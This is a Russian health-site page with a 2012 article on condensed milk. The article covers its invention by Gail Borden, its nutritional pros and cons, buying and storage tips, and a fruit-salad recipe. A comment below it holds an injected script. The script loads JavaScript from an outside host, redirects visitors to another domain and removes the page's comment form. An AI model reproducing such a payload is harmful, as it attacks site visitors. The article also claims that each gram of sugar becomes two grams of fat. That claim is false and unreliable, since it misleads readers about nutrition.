Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Dolce vita: сгущенное мол...  >>  Dolce vita: сгущенное молоко
 
Обратная связь
 

Dolce vita: сгущенное молоко

Размер шрифта
10 февраля 2012 10:50
  • google_analytics: false
  • Нравится

Полезный десерт для подвижного малыша, но сомнительное лакомство для взрослого. Как выбрать молоко, как его хранить и что можно с ним приготовить?

1

Изобретатель сгущенного молока, Гейл Борден всю жизнь мечтал придумать такой способ хранения молока, при котором оно не будет долго портиться. На это изобретение его подвигнул несчастный случай: Борден фактически стал свидетелем того, как несколько детей погибли от инфекции при употреблении молочных продуктов. Ученый решил создать молоко, которое не будет портиться. Свое изобретение он запатентовал 19 августа 1856 года.

В 1858-м году Борден открыл завод по консервированию молока. Продукт быстро набрал популярность: началась Гражданская война, и Борден снабжал сгущенкой всю армию северян. После войны Борден построил новые заводы, оставил процветающую компанию сыновьям, а сам закончил свои дни в маленьком техасском городке, который позже назвали в его честь.

Достоинства продукта:

  1. Много кальция, необходимого для костей.

  2. Много молочного белка, строительного материала для мышц.

  3. В продукте отсутствуют дрожжи, усилители вкуса или красители, как в некоторых других сладостях (пирожные, конфеты, мармелад, леденцы и т.д.).

Пьедестал почета по содержанию белка на 100 г:

1. Молоко обезжиренное сгущенное с сахаром – 11 г
2. Сливки сгущенные с сахаром – 8 г
3. Молоко сгущенное цельное с сахаром – 7 г

Недостатки продукта:

  1. В сгущенке очень много сахара. Гликемический индекс чрезвычайно высок. Чем выше этот показатель у продукта, тем быстрее глюкозы выбрасывается в кровь, и тем выше уровень инсулина в крови. Вскоре этот пик проходит, и вы снова чувствуете голод.

  2. Продукт очень жирный и калорийный. В одной банке сгущенки – 1200 ккал. В обычной сгущенке не менее 8,5 % жирности. Холестерина – 33 мг.

  3. Сочетание глюкозы и жира в этом продукте в больших количествах приводит к ожирению. Молекула глюкозы расщепляется на две молекулы жира. В результате, съедая один грамм сахара, вы получаете два грамма жира.

Как выбрать

  1. Не берите банку с выпуклой крышкой – внутри может быть токсин ботулизма.

  2. Обратите внимание на название продукта. Оно должно звучать так – «Молоко цельное сгущенное с сахаром» – это название по ГОСТу. Варианты этого названия «Сгущенка» и т.п. выдают нечестного производителя.

  3. В настоящей сгущенке только два ингредиента: молоко и сахар.

  4. Жир должен быть только молочный. Если в составе растительный жир, откажитесь от покупки: продукт ненатуральный.

  5. Дата производства выдавлена на крышке изнутри банки, и изменить ее невозможно. Другие способы указать дату производства должны вызвать подозрение.

  6. В некачественном сгущенном молоке встречается крахмал. Молоко будет гуще, но вкус испортится.

  7. Государственный стандарт продукта – ГОСТ 2903-78. Все остальные маркировки: «ТУ», «ДСТУ» и пр., не обязывают производителя придерживаться рецепта.

Как хранить

  • Хранить сгущенное молоко можно не больше одного года. По истечении этого времени происходит кристаллизация лактозы.
  • Закрытую банку сгущенки можно хранить при комнатной температуре.

1

Как правильно съесть

Не ешьте это молоко с хлебом или блинчиками, иначе выброс инсулина будет еще сильнее, а вместе с тем – нагрузка на печень.

Фруктовый салат со сгущенкой

1 часть сгущенки из обезжиренного молока.
1 часть йогурта
Апельсин
Ананас
Виноград
Клубника
Выложить смесь вместе в фруктами в половинке ананаса.

 

Сюжеты по теме:
Полезней некуда. Готовим салат со сгущенкой

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:56

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.